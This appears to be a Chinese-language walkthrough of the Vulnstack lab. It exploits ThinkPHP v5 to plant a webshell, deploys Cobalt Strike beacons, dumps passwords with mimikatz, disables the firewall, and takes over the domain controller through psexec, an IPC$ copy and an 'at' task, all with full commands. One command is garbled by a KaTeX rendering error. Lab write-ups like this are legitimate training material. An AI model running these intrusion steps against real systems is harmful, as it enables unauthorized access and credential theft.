环境搭建
下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
本次只有两台靶机 ,Win7双网卡模拟内外网
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com 改为 !qazwin7
nat:192.168.8.129 (改为dhcp获取)
仅主机:192.168.138.136
到c盘phpstudy中启动phpstudy
2008
sun\admin 2020.com 改为!qaz2008
仅主机模式:192.168.138.138
信息收集
namp扫描
nmap -sC -sV 192.168.8.129
发现http80,mysql3306
网站信息收集
发现thinkphp v5字样
漏洞利用
thinkphp漏洞
既然是thinkphp 直接跑跑工具先
果然存在好几个漏洞
getshell
直接上穿一句话木马
解析成功
蚁剑链接成功
cs上线
启动cs,生成木马
上传到目标靶机
执行木马
win7上线成功
内网横向
内网信息收集
使用cs插件ladon
发现内网网段192.168.138.0
发现存在sun.com域,并且2008dc IP为192.168.138.138
mimikatiz抓密码
使用mimikatiz抓取内存密码
得到账密
administrator !qazwin7
由于dc是内网环境不出网,因此无法直接连接到cs。
可以使用win7做会话中转,dc连到win7,win7在转发到cs,但是win7开了防火墙,需要关闭防火墙后2008才能连接win7
win7提权并关闭防火墙
win7提权到system
提权成功
关闭win7防火墙
shell netsh firewall set opmode disable
dc上线
点击win7中转-监听
端口开启
生成木马
上传木马和psexec
使用命令执行木马
提示我拒绝访问
shell c:\psexec64.exe -accepteula \192.168.138.138 -u sun\administrator -p !qazwin7 -d -c c:\2008cs.exe
换个思路
使用IPCKaTeX parse error: Undefined control sequence: \ipc at position 37: …192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator
shell copy c:\2008cs.exe \192.168.138.138\c$
查看时间,通过计划任务执行木马
shell net time \192.168.138.138
shell at \192.168.138.138 16:22:00 c:\2008cs.exe
dc上线成功并提权